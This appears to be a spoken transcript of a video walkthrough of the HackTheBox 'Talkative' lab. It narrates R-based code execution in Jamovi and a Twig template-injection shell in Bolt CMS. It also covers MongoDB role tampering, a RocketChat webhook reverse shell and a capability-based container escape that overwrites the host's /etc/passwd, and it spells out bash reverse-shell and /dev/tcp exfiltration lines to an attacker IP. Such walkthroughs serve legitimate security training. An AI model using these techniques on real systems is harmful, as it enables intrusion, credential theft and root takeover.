What's going on YouTube? This is Ipsec. We're doing Talkative from HackTheBox, which the hard thing about this box was the enumeration. All the exploits weren't really that tough. They were pretty simple, but they were just getting the pieces to a puzzle, and putting the puzzle together, tying all the exploits together, is what made this extremely challenging. Once you nmap the box, you find like 4 or 5 different websites, which are each Docker containers. The first one to exploit is an online document editor called Jamovi. You get access to that by putting a formula in that allows code execution. Download a document off of Jamovi that has credentials, and you can use that to log into the Bolt CMS and get a shell there, which is another Docker container, but this one's different. It's on a Docker network that can talk to the host over SSH, so you can use credentials from Jamovi to get into the host. Now, the hardest part is going from the host back down to a different Docker container because it has a capability. So you access a MongoDB instance, you can edit the user to be an admin, then log into RocketChat, create a webhook, get code execution there, abuse the Docker capability, and get root. So with that being said, let's jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it talkative, and then the IP address of 10.10.11.155. This can take some time to run, so I've already ran it. Looking at the results, we have just 5 ports open. The first one being SSH, and actually this is filtered, it's not open. So it just means this port is behaving differently than the other closed ports on the box, which likely means there's a firewall here dropping the packets. The first open port is HTTP on port 80. It's running an Apache web server, which the header tells us it's a Debian box, and it directs us over to talkative.htb. So let's just add this over to a host file. So sudo vi etc host, and we can go 10.10.11.155 talkative.htb. And the next 3 web servers is Tornado HTTPD 5.0, which is just a Python web server. There are some odd things about this, like the port 8080. The title for this one is Jamovi, and on 8082, maybe it's giving us a IP address. I don't know if this is to all of the web servers or 172.17.02, but yeah. So let's just go over to talkative.htb. So if we go 10.10.11.155, it's going to direct us to talkative.htb, and we get a page. The first thing I always like doing is a Control-U and looking at the source just to see if there's like a wp-admin or something that would leak whatever content management system is using. We do see content equals Bolt, which is Bolt CMS. One of the default places of a Bolt website is /Bolt. And I just realized I said Bolt like 3 times, but doing this, we get to a login panel. So that's going to be the login panel to this CMS. And scrolling, let's see, there is an About page. If we click on About, it gives us their team, Saul Goodman, Matt Williams, and Janet Smith, which are just 3 names. If we go down, we see the same 3 things. These names could potentially be used in a brute force attack or just looking up information in OSINT. And then keep scrolling down, we see products. There are 3, Talkastats, TalkZone, and Talk4Biz. And if we go back to the Tornado web servers, it kind of makes sense that those apps could have been these things. If we look at 8080, there's Jamovi, and Talkastats does talk about their partnership with Jamovi. This one is talking about RocketChat, and then we just have TalkZone, which seems like it's a chat room. Unique chat portals, RocketChat's also a chat. I want to say port 3000 is the default one for RocketZone, but let's just run a full nmap. So sudo nmap -p -10.10.11.155 -oa. We'll put it in talkative or nmap and call it all ports, and then add the -v so it shows us open ports as we find them. But if we hover over action, it goes to About Us, and it says ready to get started and gives us a link over to the RocketChat application, I believe. This had hovered. This is a hard link to click or a button. I'm going to refresh the page and go back to it. Oh, I saw it right here. And it directs us over to port 3000, which is RocketChat. I'm assuming it's like a default for whatever language this is, because I want to say Mattermost is also defaulted to port 3000. Maybe it's, let's see, what is RocketChat coded in? RocketChat GitHub. Is it Node? Let's see. RocketChat TypeScript. So it's a JavaScript thing, but I think Ruby may listen on port 3000 by default anyways, but that's enough enumerating of these websites. We just really know there's 2 different places we can log in. I guess we could try creating a RocketChat account. So let's go back to port 3000 and see if it lets us generate accounts. So we can register a new account. I'll do ipsec root at ipsec.rocks, and we'll put the password of password to try and register a new account. And it gets invalid domain. So let's just try putting talkative.htb as the domain. So talkative.htb, click register a new account. We'll use the name ipsec, and it looks like we're in their Mattermost server, or RocketChat. I get all these chat applications mixed up. Clicking on directory is going to reveal a channel, and we just see us and admin in it. Go back to the directory, look at users, and I guess there's 2 other users, rocket.cat and admin. And admin is going to be Saul Goodman, who from the About Us page was the CEO. So let's go and take a look at the next port, which would be 8080. And the full nmap scan did reveal port 3000 open that we found through a link. So let's go talkative.htb, port 8080. We get Jamovi. If we go to 8081, not found. And 8082, we get a not found as well. I probably should start like a Go Buster on both of these ports and trying to enumerate it. It looks like an API server, but for the sake of the length of the video, I'm not going to bother that and run the recon then background. So let's go back to Jamovi, and I accidentally closed the tab. So port 8080. And this is an icon. I recognize the icon. It's the R programming language. If we go here in the RJ editor, it looks like a way to execute code. Well, I knew the logo of R, but I don't know any of the syntax. So I'm going to go over to Google, and we're going to say like R language system command and see what it says. So it looks like it has a command. It's just system. And then we do the command. And if we look, the intern indicates whether we want to capture the output of the command. So I'm going to set intern to true. So if I do system, who am I, intern equals true, and then it says hit Control-Shift-Enter to run, it shows us as root. So we can try getting a shell on this. And can I make this bigger? I can. So I'm going to try bash-c, then bash-i, dev tcp 10.10.14.8, 9001, 0 and 1 like that, and the quote, and let's listen on port 9001. Control-Shift-Enter, and going back over here, we have the shell. So let's do python 3-c import pty, pty.spawn, bin bash, enter, and then Control-Z, stty raw minus echo, and then fg enter enter. And looking at this, actually let's export term equal xterm. So now we can clear the screen. And if we look around at this container, I know it's a container just based upon the hostname, this B06. We also see a .docker env file. If we cat it, we don't get anything. If we go into the home directory, we do have this omv file that's Bolt administration. And this is likely going to be the documents from the Jamovi instance, because we got a shell on this, and omv is, I think, a file extension for Jamovi. If we do a file against it, it's a zip archive. So let's send it over to our web server. So I'm going to do nc-lvnp 9001 and direct it to, we'll call it bolt administration.omv. And then if do we have nc on the box? We don't. I wonder if I can just cat bolt administration to dev tcp 10.10.14.8 9001. Looks like I can. If I file bolt administration here, we get a zip archive, and if we MD5 sum them, let's make sure they're the same. Looks like they are, so we can transfer files that way. I'm going to make a directory called bolt admin, and we'll unzip it from this directory. I'm always hesitant when I run unzip commands because of the chance that they... hold on a second. Bolt admin. Unzip. I'm kind of curious why it didn't autocomplete this name, but I don't like when zips do this and extract into the current working directory, because this would have clobbered the directory I was in. So I always create a directory before unzipping. So if we look around at this, there is data.bin. So if we do a strings against it, it looks empty. lsla data.bin. Let's see, 48. So there is data, but it's just pretty much non-printable characters. So there is index.html. If we look at it, it's looking like it's talking about the R language. An HTTP page. If we go to xdata.json, we have some data here. And it looks like we have potential passwords. So I'm going to pipe this over to JQ just because it makes it a bit easier to read. And I guess we have 3 users, Matt, Janet, and Saul, and 3 passwords. So I'm guessing, was it Matt is the first user? Yeah, Matt's password is going to be this. So we can try logging in. Actually, Saul would be the first one we should try because we know Saul has an account on RocketChat. So we can try logging into RocketChat Saul. He is admin here. So how do I log out of RocketChat? Maybe click my name, log out. And we know Saul is here. So if we do admin and put this in, we get login failure. We could try each password, but I know that's not going to work. I'm going to go to this one, and this is Matt. So let's try Matt over on this Bolt site. So if I do Matt and put in the password, we don't get anything. If I try Matt at talkative.htb, do the same thing, doesn't work. If we try admin and log in, we get access into Bolt. I'm guessing this login is taking much longer than it did to deny me. So either I'm blocked or it worked and it's just taking a long time to generate the session. I'm going to open another thing to this page because it should not take this long. Oh, there we go. So we have now logged in here. And if we go over to configuration, main configuration, we can look at the configuration file. We could also go over to file management and view and edit templates. And this is going to allow us to edit the Talkative website. So if I just go back to talkative.htb, I'm going to do Control U to look at the source. We can see it's going to theme base 2021. So in this, I'm going to click on base 2021, and we should be able to edit the website. I'm seeing if there's like a create button. Doesn't look like there is. If I go to, is there a /listing here? I always hate editing the main website, right? So I always try to go to a lesser used function, and I don't see it in here. Theme.yaml, don't know what that's doing. Let's just click on index.twig, and at the bottom of the page, I'm going to put test, and we'll say ipsec, right? If we click Save Changes and go back to Talkative, we can search for ipsec, and we don't see anything. We can also go into the source code just in case for some reason wasn't showing on the website. If we look at maintenance, there is a cache, and clearing the cache is going to clear all the pre-compiled YAML files. So that's going to be what lets us edit the website, I believe. So refreshing this, if I search for ipsec, we see test ipsec right here. So we definitely have a way to edit code on this site. I'm just looking for where I was. Oh, to clear the cache page. There we go. So if we put a reverse shell here, it would execute. And this is Twig, which is a templating language, very much like J2 or Jinja 2. That's the one you're probably most familiar with. But I'm just going to Google payload all the things, Twig, and find a payload from here. So if we go here, look at Twig, and we see code execution, and I'm just going to copy one of these. It looks like this is probably going to be the easiest one to do. I was avoiding this because it's like using special characters for white space. I don't know if we can't use spaces there. So that's why I'm choosing this payload. Let's go to Talkative. Let's see, we don't want the source. I'm just going to close these tabs so I stop getting confused. I'm going to put this here. And let's just go for shell right off the bat. So bash-c, and I'm going to change these quotes. No real reason. I don't know if it would work with or without it, but I just always use this one type of quote for my reverse shell. 0 and 1. And the reason why I do that is I try to change as little as possible from these commands that if they failed, it would take a long time to troubleshoot. I'm not positive of putting double quotes around this if I'd have to do any escaping around like these special characters. So that's why I just stick to what I know works. And we save that. We should listen on port. And since I have a reverse shell on this window, I'm going to create a new window to get a different reverse shell so we can label them. So just make sure this is copied, clear the cache, and then I'm going to refresh the main page and see if we get a shell. Does not look like we do. If we go down to the bottom of the page where we had it, we see ID 1. So we executed something, but we screwed up. Bash-c, bash-i, dev tcp 10.10.14.8. I think the shell works. Oh, there's no system here. I don't know how I screwed that up. Oh, it's putting the command here. So I replace system. Oh, I'm an idiot. Let's just use this one and see if we have to have white spaces. And there we go. I can copy this command here. And what was going on here is this had system, and this system was running this command. And maybe this is just a way to split up the spaces, and you could do it with any of them. Let's see what happens with this. Wait, was this in quotes? Cat, it was. So do double quotes here. We can save, clear the cache, refresh, and we get a shell. So yeah. Let's go and do a trick again. Python-c, input pty, pty.spawn, bin bash. Python 3 not found. We can do a which Python 2, which Python, and we don't have Python installed here. Another way we can get a TTY is script-q. Was it dev null bash like this? And now we can do stty raw minus echo, fg enter enter. And we should have the up arrow. Script-q dev null. Let's see. Let's exit script. Script-q dev null bin sh. I don't know why up arrow isn't working. If I control C, I'm still in the box. So maybe that's just something wrong with how I'm doing the script command, but as long as I can control C, I'm happy. Let's see. Export term is equal to xterm. Can't clear the screen as well. What's my stty command? Raw minus echo. Okay, well, I'm going to move on. Is it a bash thing? ls. Okay, it's because I was in bin sh, not bin bash. So, lspu. Yep, there we go. Awesome. So the first thing I generally do whenever I get on a server is try to get the database credentials. So I can do a database dump and try to get other credentials from that. So let's grep-ri password in the config directory. And we don't really see anything too interesting. I'm going to grep for database. And we're saying references to the database being stored in the environment. Even this bolt config.yaml says database setup is best done in environment variables. So if we less bolt config, if there's anything else there, database, let's see, I'm gonna, did I do this? stty-a, no, my rows and columns are 0. So rows 26, columns 105. stty rows 26, cols, was it 105? And now when I do my less, it should behave better. So I'm only saying database in this config file as a comment. So I'm going to go back to the Bolt directory, and I'm going to cat.env to go to where the environment variable most likely is. We could potentially just do an env command and get it that way, but since we're spawned in so many processes, I'm guessing we've lost it. If I cat.env, let's grep for data, we can see the database URL is this SQLite. If I did env grep for data, it's not there because, again, if I do ps-ef forest, let's see, I'm running in this script and this bash and this bash and this bash. So I bet if I went back to the web server and did the environ command instead of send the reverse shell, we would probably see it. But since it is SQLite, there are no credentials to access it. It is in var data bolt.sqlite. Another file that would be interesting to us as well is the Docker compose file here, but I'm guessing this is default for the system and not necessarily what was used, because this one is sending MySQL database information in a different Docker container and has a password, but the config in this Docker compose is not being used. I was just showing you that because it may be useful doing other enumeration on other things. So Docker files are always good to grab. Looking at this, we know the database name is bolt.sqlite. I don't know what the kernel project directory is, so I'm just going to do a find-name and then pipe errors to dev null. And we see the kernel project directory is just the working directory. So we have a SQLite database here. If I do SQLite, we don't have any way to dump it on this box, so let's send it back to us. Let's listen on nclvnp 9001. I'll call this bolt.sqlite. Dev tcp 10.10.14.8 9001. Sent. And now if I do SQLite, what is it? Yeah, SQLite 3 bolt.sql. We can do a .dump and dump everything. Looks like this database is quite big. I wonder if I do .schemas or .schema, we can see what the schema would be. Let's see. I'm going to search this for password. Bolt password request. Bolt underscore user is what we want to dump. So if we do a select stir from Bolt user, If I spelt that correctly, maybe we can get the users and potential passwords. And it doesn't look like SQLite has \g like MySQL does. But they are in Argon 2, and I don't think we get anything from cracking these, so I'm not going to waste the time and show trying to crack things out of Bolt. But that is just one of the enumeration steps I would generally always do. Again, in the sake of not having this video be 3 hours, I can't show the full paths for every single possible thing if it doesn't pan out. But another thing we could try doing is looking at hostname-i to get the IP address of this container, and we see it's at 172.17.0.12. Now, this .12 is interesting because IP start at .2. The host system is generally .1. We know there's at least 2 Dockers because we're in this one. If we do hostname-i here, we see we're on the 18 network. So this is a completely separate network. I don't think .2, this guy can even talk to the 17. Let's do .12 like this. Ping not found. Do we have ping here? No, we do not. We'd have to upload nmap or something like that and check. Actually, Bolt, let's see, SSLNTP. We can probably look at listening ports. AN, we don't have netstat. If I cat proc net TCP, we can see, let's see, any host, or 0.0.0, is listening on hex 50. If we converted 50 hex to decimal, that would be port 80. So we know this guy is listening on port 80. So we could probably, do we have curl? We don't. wget, don't. Cat dev TCP 172.17.0.12 port 80. We can see no such follow directory. I bet if we did that here, let's start up a web server. And let's cat 10.10.14.8, port 8000. It doesn't look like we can do it that way, actually. I want to make sure I'm in bash. Nope, I wonder if we do a redirector. Does that work? No. I could swear there was a way to do this. NC LVNP 8000. So it connects. Oh, it's because we're not sending a command, I think. And the command being like the get /http 1/1.1 or whatever, like that would be the command. But I can probably get this via exit codes now that I'm thinking. So if I run this echo command, we can see it connected to me. And if I echo $? We get the exit code, which is 0. That is a success. If I do this command again, now that I'm not listening, we get a 1. So we do have a way to enumerate ports this way. So what I wanted to do is now test this against 172.17.0.12. So right off the bat, it's taking longer, which means it probably isn't resolving this host name. So this Docker network, we can see 130, which I'm guessing is the exit code if it can't hit that. But 172.17.0.12 is not reachable from 172.18. So it's a long way to go with saying this is why I'm going to do the enumeration from this container instead of the previous one. If we SSH to 172.17.0.1, which is going to be the host computer, which generally means SSH is open. Additionally, if we go back to our nmap, if we cat nmap talkative.nmap, where 22 was filtered, we assume port 22 is filtered going from the 10.10.14 network to this box. So that could be just like on an edge firewall, right? But now that we're on a Docker container, we're past that firewall and we're accessing port 22 from a different box. So let's do SSH. Matt was the first user we had from that Jamovi document. If we do yes, let's go, what is it, Bolt admin, then cat xdata.json jq dot. We can try this password, copy, paste it in, and we get access denied. Every other username has been admin with that password, so we can try this here, and it doesn't work. There were other users on that site like Janet and Saul, so if we try Saul, paste the password in, and we get on the box. So this is how we get user.txt, and we have escaped Docker. Now, the weird thing's going to be, we have to go into Docker again to privask, because the privask involves a Docker capability, which is really tough to enumerate on this host. I can't tell how much time I spent trying to find a privask from host to root when I had to go back down again to get information out of a Docker container. Now, the thing that came in really handy when doing this box is the psef-force command. I'm going to do ~S. If I don't do that, I think the line breaks, it gets hard to move to the left, right? So if I do ~S, I'll go in this panel. Everything's going to be on one line, so if I can hit the right key and keep going over to see what that is. If I just do less, does it do that, or is it on multi-lines? Yeah, so with just less without the ~S, we kind of have to click around to read lines, so I always like using that. And this becomes important because we don't have Docker PS, so we can't list all the containers running. But from the PS command, we can see the output of, well, not the output, but the command line of a lot of these containers. So we can see right here, it's doing Docker proxy. So this is exposing port 8082 to the 172.18.02 container on port 41339. And it's also on port 41338. So I don't know exactly what those are, but 1802, that is this guy. And if I cat procnet TCP, and we look at one of these ports, probably A179 and A17B, these are going to be those super high ports that we saw on that command. So I'm just going to Google hexadecimal. I probably could have done it in Python in a quick one-liner, but I'm lazy sometimes. So if I just convert this, 41337. So we're kind of making sense of these ports. So it goes 7, 8, and 9. We have the 172.17.01 again. Again, this is going to be my router, and it's exposing a bunch more ports, like 6000, 6001. And those did not show up on nmap. So that is a bit odd. Let's see. Oh, because it's not on all host. So it's just exposing these ports to the containers, right? Because when we're on the internet, we can't hit, or 10.10.14 network, we can't hit the 172.17 network. So the other thing is we have this user bin, container shim, Moby, and this is going to be what the actual application is. So this one container is running Jamovi right here, right? This is the startup, and we can see all the processes in that of us exploiting Jamovi with our shell, right? So there is Mongo. So we know one of the containers is running MongoDB. And these are all Apache. And we saw a bunch of those Apache processes when we're poking around the Bolt site. And here, the reverse shell from that. But the key thing is MongoDB, because that's another database that we haven't had access to. So if we Google MongoDB default port, let's do this. It is 27017. So I'm going to do my echo trick. So 172 dev TCP 172.17.17.02, and then not that port, 27017. Okay, and I think we can just do that. And we see exit code 0 on 172.17.02, and on other ports, or other host, we're getting 1. So we could have wrote a script to loop over this, but I want to show how it works. And now we know that MongoDB is on this 172.17.0.2 container. It's the very first one, but we don't have really a way to dump this. If I think there's like mongo dump is the command I want. Do I have it on this? Or mongo? I don't have any mongo commands on my host, so we're probably going to have to install the package on our host so we can talk to this Mongo database. Where was that shell? Right here. We do have SSH, but we're SSH'd after we did the reverse shell. So if I do my like SSH command to do this and set up a port forward, it's going to send it to the Docker container, not my host, because that's where SSH is running. The easiest thing to do here is just download a copy of Chisel. I always like just going to the GitHub to make sure I get the latest version. So we can download Chisel. If we go to releases and get Linux AMD 64. Okay. And now we can move downloads Chisel to a directory. Let's see, cannot stat it. Okay. And let's see, do I have a dub? I don't. Let's make that. Move Chisel to dub. And then gunzip-d. And I'm just going to make it easier to type by just calling it Chisel. Okay. So Python 3-m HTTP server. And let's download. So curl 10.10.14.8 port 8000 / chisel -o chisel. So now that that is downloaded, we can set up a Chisel server on my host. So chmod +x Chisel. And now to start Chisel, so /chisel server, we want to do -- reverse, and let's listen on port 8000. And then chmod +x Chisel here. We can do Chisel client 10.10.14.8 port 8000. Set up a reverse port. The MongoDB port, let's see, that was 27017. So let's listen on that port on our host and direct it to 172.17.02 on the MongoDB port. Connected, and now we're sending all the traffic. So the next thing we need is to get Mongo Shell because we have Mongo command not found. So if we just Google, let's Google MongoDB Shell, we have a few downloads here. And clicking on MongoDB Shell, Debian 154, we have a download package. So let's download that, then sudo dpackage-i. What was it? MongoDB, that looks good. See if it installs. And we have Mongo sh. And it looks like we connected right away. And we didn't have to specify the port or anything because, or IP address, because by default it connects to localhost 27017. So remember, this is a port forward, so this is really connecting to that Docker container at 172.17.01. the first command I always run when I connect to a database is show databases. So we run that command and we have admin config local meteor. Well, admin I think is going to be the administrative section of MongoDB, and we didn't use credentials to access this, so I'm not too interested in it. Meteor is definitely not a standard one, so I'm going to use that database. If we do show collections, this is going to be like show tables, and we can see this is the RocketChat. And there is a users collection, which is a table. So we're going to do DB. This is going to be like the equivalent of a select star from database command in Mongo. So we do DB. Since we did use Meteor before, DB gets translated to Meteor. Then we want to do users and call find on it. And we can see there is how many users? RocketCat. I'm guessing this is a default user for RocketChat, or maybe the creator made it. And his ID is ZLM, and this is the password, right? Then we have Saul, his ID, and his password. And let's see, email root. Oh, this is me, root at talkative.htb. Username's IPsec. Role is user here. Let's see, where are the roles of this? Saul is admin. And RocketCat. Where is RocketCat's role? It's a bot. So there are two things we can do. We have database access, right? So we can either set my role to be an admin and log in, or we can change Saul Goodman's password to be our password. And then we'd, of course, update it back, right? Because actually, this is me. Saul Goodman's password is up here. But we could potentially log in as him if we edit this hash to be ours, use our password, then change the hash back to be his. I'm going to opt for just changing my user to be admin because that's less intrusive. Also, if like multi-factor authentication or something's enabled for his account, he'd be notified, right? So I'm going to do db.users.update, and then we pass it a dictionary file. So where my ID is equal to, and it's going to be this weird thing. And I don't think that's in quotes. Maybe it is. We'll put it in quotes. If it was just numeric, then I would not have put it in quotes. Then we want to set roles is equal to admin. And then close roles, close set, close ID, and then end parentheses. Unexpected comma. Let's see, DB users update. ID. Set roles. Character 76. I'm just going to try removing one of these. There we go. I had too many brackets. I don't know why I expected a comma there, but the answer was mismatched. This is one, and this is one. I was not thinking I closed the ID here, but so. Now our user is admin. So let's go back to, was it talkative.htb port 3000? And we can log in. Let's see, email or username. I think I did IPsec and a password of password. And now, let's see, create new options, administration. We're an admin on this RocketChat server. And if you just poked around here or did some Googling, you'd find the integrations, and this is a good place for code execution. A lot of applications, once you get to administrative user, do have some dangerous functions that let you take over the server. So if we click on new integration, then incoming webhook, we can create one. Let's call this please subscribe, post a channel or user. We'll send it to IPsec, users IPsec. We'll call it the bot, enabled true. And then we have to come up with a script. So I'm going to Google GitHub RocketChat because I want to see what RocketChat's coded in. So if we go to the GitHub, we can see it's TypeScript, which is going to be some form of JavaScript. So I'm just going to Google Node.js execute code or execute system and maybe add RocketChat. Let's see. Let's just do execute system RocketChat or Node.js like this. Shell commands with Node.js, the exec function. So I know it's like with child process create, I believe. Then you can exec. Let's see. This is taking entirely too long. Node.js execute system. Child process. So we can copy this and see if this works. Is there a better one? Let's see, Node.js, payload all the things. That's all reverse shells. Let's just try executing this one. So copy this, paste the script, require child process. It's just doing an ls. That should be fine. Save. Actually, instead of ls, let's ping, or I'm going to keep it as ls. I was going to ping, but I remembered all the other Docker containers did not have ping, which could make it tough. Guess we could cat to dev tcp 10.10.14.8 9001, and we can do --c. This should be a good way to identify. And I just want to make sure this does connect to me. So let's open a new window. 9001. Okay. So now this script should execute, except we don't have a way to trigger this integration. Generally, like incoming webhooks give us a webhook right here. And the script went away. That's odd. Save. Let's nclvnp. Curl this script. Success false. I wonder if the issue is the script not being saved there. Do we need post as ipsec like that? Let's see. I would assume this would work if this is a good script, but nothing seems to be working. I'm going to go copy this again. If I click on integrations, click on this webhook. Don't know if that's a good thing or bad thing. I don't like the script going away each time, but maybe it does. Let's see. Let's Google RocketChat admin RCE. Go to this GitHub page, and it's giving us a different thing. This one is doing process main module require. So I think all that does is put it before this, actually. Yeah, I think that's all it was doing, but let's just copy this whole thing. Paste. And we can do --c, --i, dev tcp 10.10.14.8, 9001, 0, and 1 like that. So let's save this. Hit the webhook, and we have a root shell. And again, in yet another Docker container. This time, I'm not going to worry about enumerating the entire database, because that's how we got into this application, is through the database. We don't have Python, so I'm doing the script-q to get the interactive shell, stty raw -echo fg. And I thought we did something else. We called bash. There we go. So I don't have a good reason to explain why we didn't run this on all the previous Dockers, other than it was just hindsight bias of me not wanting to waste time showing the same thing every time. But in Docker land, there's something called capabilities that gives the container some extended capability. I guess that wasn't that beneficial. That was like a no-duh thing, right? But it's not installed on this host. So we have to install the binaries that enable us to enumerate these capabilities so we can see what the exploitation path is. So we can either try to install capsh on the Docker container we're in, or find out how it enumerates what the capabilities are. Now, the way I did it was went over to the linp's GitHub, and I did this because I know linp's itself does identify container capabilities. I just couldn't run linp's because I don't have Python, right? So I'm going to look at the container script because I'm assuming container capabilities would be from the script. And we see it's checking if capsh is a command. And since it's not, it's going to cat proc self status and grep cap. So let's run this command. And we can see it's probably in a mask. So we have to figure out how to translate this hex into something, right? So the next thing I did was went on my host system where I have capsh installed, did a -h to see if it has any type of like way to input a number, and then --decode decodes a hex string to a list of capabilities. So we can do capsh --decode, paste it in, and we have a list of the capabilities running on that container. So the other thing is we can go over to this Hacktricks page about the capabilities, and it's saying cap sysadmin, sysptrace, sysmodule, dacread search, and we have cap dacread search here. We don't have any of the other ones, so what we want to do is see how we can abuse dacread search. Is it on this page? It's not. I'm just going to Google Hacktricks dacread search, go to the Linux capabilities page, and this is where it's going to talk about it. I think I was there and that went up. Here we go. And I believe this is some weird race condition, right? It allows us to bypass file read and directory read and execute permissions. The purpose of this is allowing a Docker container to read files. So if we keep scrolling down, they do have an exploit script for this. I'm just going to click this copy command, and I'm going to do, let's go back to this one, cd www v shocker.c. And the example it gives is read shadow from host. Let's see. It's probably better shown in a browser with the line breaks, right? Let's see. Do we have an example? Right here. So we do /soccer, the location of the file on the host, and the file we want in. And it's using etc shadow. I'm not going to do that because I don't have another copy of shadow from this box. Let's save. We can GCC it real quick. Let's give it a name. But I'm going to copy it to this, and then we're going to explain how we're going to get the file that we want off the box, right? So let's, do we have curl or wget? Which wget? Nope. So let's download it with cat. So how are we doing it before? Cat dev tcp 10.10.14.8 9001 to shocker nclvnp 9001 direct shocker to that. Let's see, dev tcp Well, that's weird. I wonder if bash is like wrapped over to dash. Let's see, bash dash c. Will this work? Which bash? I'm actually not sure why that's not working. I swear that's how I did it before. I know we did this to test ports. So that worked. Which NC we don't have. Let's go back to the cat. And I'm going to reverse the input. So I'm going to cat from that. And I'm going to direct it to Shocker. Let's see if this one works. That looks promising. MD5 sum Shocker. MD5 sum Shocker. So we've copied the file up now. The next thing we need to do is get a dummy file, right? And let's see. That's chisel. I think we can safely kill chisel now. Because we want to go on this host. And we know what the passwd file is, right? So we can copy this and then add a new line as root. So if I copy, we go over to this shell. I'm going to say passwd. Oh, we don't have a VI? That's stupid. Let's do v passwd here. That's the right clipboard. And we're going to add a new line for root, but we're going to call him root backwards, and we're going to put a password here. So I think we can do open SSL-crypt, and I'm going to call it please subscribe. Let's see. Open SSL crypt passwd password. Open SSL passwd -crypt. There we go. I don't like the truncating thing, so let's just try this. Insert. Okay. So nc lvnp 9001 passwd, and let's download that file. So this will be passwd. If we cat it, we can see our new user. So I'm going to run /shocker etc passwd. So this should replace the passwd on the host with our malicious one. It says success. So let's go back to this shell. And I can cat etc passwd. And we don't see a root there. So I don't think that was a success. su dash. Well, I don't see tor there, T-O-O-R. Does not exist. So I don't think that worked. It says it did. But it doesn't look like it did. V-test. This is a test. I can't write that. cd dev shm v-test. This is a test. Okay. So let's do dev shm test and try putting passwd there. Can't find it. MV test to, let's see, what do we have write access to? I guess we could try temp. I kind of avoid temp because of the systemd private temp directories. It says success in temp. cd temp, cat test, but it did not write. So I'm going to, let's see, vtest or echo this a test. So I wonder if it has to be the same size. So it says success, but it did not write. Let's see. I'm just going to sh-tor it. Oh, we don't even sh this box. We could exit this shell and see if this works. Please. Nope, access denied. So I'm guessing it's how we are doing the pivot or doing the file edit. So let's cat xdata.json jq dot. Copy this password and get back in here. Okay. Okay, I found out what I did wrong. I still don't know exactly why this next piece is going to work. But if we go back to what we were doing with the shocker command. So we do etc passwd does not exist. Well, now the file is going to exist. If I cat this, it's going to be the passwd file. So this is a file read. So we could read shadow as well. I wonder if the file has to be deleted. Nope. There it is. So we could try cracking the root password, but I don't believe it's going to crack. We could check for things like the SSH key, so root SSH ID RSA. See if we can read that. We can't. So the next piece, I don't know exactly why it works. If we use the capDAC override permission, even though we don't have it, right? So here's the capsh command. And if we look for override, we don't have the capability, but this next thing actually works. So let's go in www. I'm going to call it shocker-write.c. We'll paste it. And then gcc-o shocker write. Like that. Okay. Then nc lvnp. Let's fake that typo before it bites us. nc lvnp 9001 shocker write. And then we can cat dev tcp 10.10.14.8 9001 to shocker write. Okay. I also have the passwd file here, right? Yep. So let's upload passwd again, because when we were doing the exploit before, we accidentally wiped our copy. So we have both of those, chmod plus x. I still can't type. I think it's shocker, right? Is it? Yeah. Not that it matters. Etsy passwd, passwd. So now if we look at cat etsy passwd, we see our new user. If we su to tor and type the password of, I think it was please, we are now root at Talkative. And again, that works because this passwd file, we specified our UID and GID was 0, which is the root user. So we could cat root.text And that is the box. So hope you guys enjoyed it. Take care, and I will see you all next week.